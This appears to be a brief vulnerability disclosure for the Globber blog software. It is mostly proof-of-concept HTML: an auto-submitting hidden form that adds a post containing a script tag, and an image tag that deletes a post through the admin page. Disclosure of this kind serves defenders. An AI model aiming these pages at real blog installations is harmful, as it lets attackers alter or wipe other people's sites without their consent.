A cross-site Request Forgery vulnerability in Globber can be exploited
to add and delete blog posts.
PoC
<!-- Add (note that blog also must be "rebuilt") -->
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/globber/admin.php?task=edit&c=Misc&a=new-article">
<input type="hidden" name="title" value="New Article" />
<input type="hidden" name="date" value="06-07-2010 10:16 pm" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="content" value="<script>alert(0)</script>" />
</form>
</body>
</html>
<!-- Delete -->
<html>
<body>
<img src="http://localhost/globber/admin.php?task=articles&delc=Misc&dela=first-post" />
</body>
</html>